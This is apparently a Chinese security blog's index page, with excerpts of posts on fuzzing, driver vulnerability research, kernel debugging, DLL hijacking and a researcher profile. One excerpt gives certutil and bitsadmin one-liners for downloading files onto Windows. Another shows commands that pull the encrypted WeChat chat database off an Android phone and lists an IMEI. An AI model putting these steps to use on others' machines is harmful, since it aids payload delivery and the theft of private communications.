地狱怪客

Google自定义搜索引擎

文章来源:http://www.cnblogs.com/mingjiatang/p/6048193.html   本文主要介绍如何通过Google的API来定义自己的搜索引擎,并将Google搜索框嵌入到自己的web页面。另外,分析了自定义搜索引擎请求数据的url,模拟请求并获取搜索的结果。 1 写在前面 前段时间发现了一个网站提供搜索百度网盘资源,挺好用的,但是广告很多,于是自己做了一 […]

windows下载姿势

certutil -urlcache -split -f  http://www.baidu.com/1.rar bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip

初识 Fuzzing 工具 WinAFL

文章出处:http://paper.seebug.org/323/ 作者:xd0ol1(知道创宇404实验室) 0 引子 本文前两节将简要讨论 fuzzing 的基本理念以及 WinAFL 中所用到的插桩框架 DynamoRIO ,而后我们从源码和工具使用角度带你了解这个适用于 Windows 平台的 fuzzing 利器。 1 Fuzzing 101 就 fuzzing 而言,它是一种将无效、未 […]

android微信聊天记录解密

cd /data/data/com.tencent.mm/MicroMsg/81b4065cbd0c3672469fc95f9cb23aaa cp EnMicroMsg.db …  & chmod 777  EnMicroMsg.db & adb pull … 拨*#06# 获取IMEI = 356489053711441 cd /data/data/com […]

驱动漏洞挖掘2-了解驱动结构体fuzz笔记

///////////////////////////////////////// 2017/07/13 学习书籍:《Windows内核安全与驱动开发》 目的:看IDA如看源码,知道Fuzz目标与参数控制 // // Define the major function codes for IRPs. // #define IRP_MJ_CREATE 0x00 #define IRP_MJ_CREA […]

几种软件缺陷的可能利用方法

几种软件缺陷的可能利用方法 作者:吴石 我的题目是几种不常见的软件缺陷,但是内容可能有一些出入。第二,我也是一个初学者,PPT里可能也存在很多问题,也希望各位专家指出来。 我们先看看常见的软件缺陷: 第一,栈溢出。就是在栈中申请一段内存,一般是数组或字符串,在对这段内存做操作的时候,错误的写操作可能导致栈中也特殊意义的地址被用户的输入内容所控制。最早发现是一些字符串操作的函数中,比如strcat, […]

吴石 – 寻找网络漏洞的人

自由人”吴石   在2010年6月的一次安全更新中,苹果公司针对iPhone操作系统发布了64个新补丁,在这之中,有15个漏洞都是由吴石发现的,而由苹果内部研究人员发现的漏洞只有6个。美国《福布斯》杂志在一篇文章中写道:“自2007年以来,这位家住上海的35岁研究员已经发现并报告了IE、Safari和Chrome等浏览器中存在的100多个严重漏洞……这表明吴石一年汇报给ZDI和iDefense的漏 […]

驱动漏洞挖掘1-双机调试

2. Win7下面没有了boot.ini,用bcdedit.exe命令行来配置(和以往唯一的区别); 3. 拷贝当前的配置; bcdedit /copy {current} /d “Windows 7 Debug” 4. 记录新加的标识符GUID; bcdedit 5. 对新加的启动项,增加调试功能; bcdedit /debug {之前查询到的标识符GUID} ON 6. […]

通过Procmon发现DLL劫持

Procmon.exe Procmon是微软出的一款强大的Windows监视工具,不但可以监视进程/线程,还可以监控到文件系统,注册表的变化等。 install_flashplayer15x32_mssd_aaa_aih 这里我们以flashplayer安装文件作为目标文件,版本为15x32_mssd_aaa_aih,可自行下载,或者从最后的打包附件中找到。 详细提权过程 查找可劫持的dll文件 […]

双机调试-挖洞1

http://jingyan.baidu.com/article/c843ea0b74507a77931e4abd.html windbg 双机调试配置(xp)系统 windbg+vm双机调试 waiting to reconnect 无法连接问题,解决办法 http://www.mamicode.com/info-detail-273388.html

Windows Driver Fuzz 多年前的资料

http://bbs.pediy.com/thread-198766.htm 百度卫士驱动设备打开绕过   百度杀毒 BDMWrench 驱动缓冲区溢出漏洞 http://bbs.pediy.com/thread-198848.htm   百度BDArkit驱动任意地址写漏洞 http://www.hackdig.com/07/hack-23920.htm   Win […]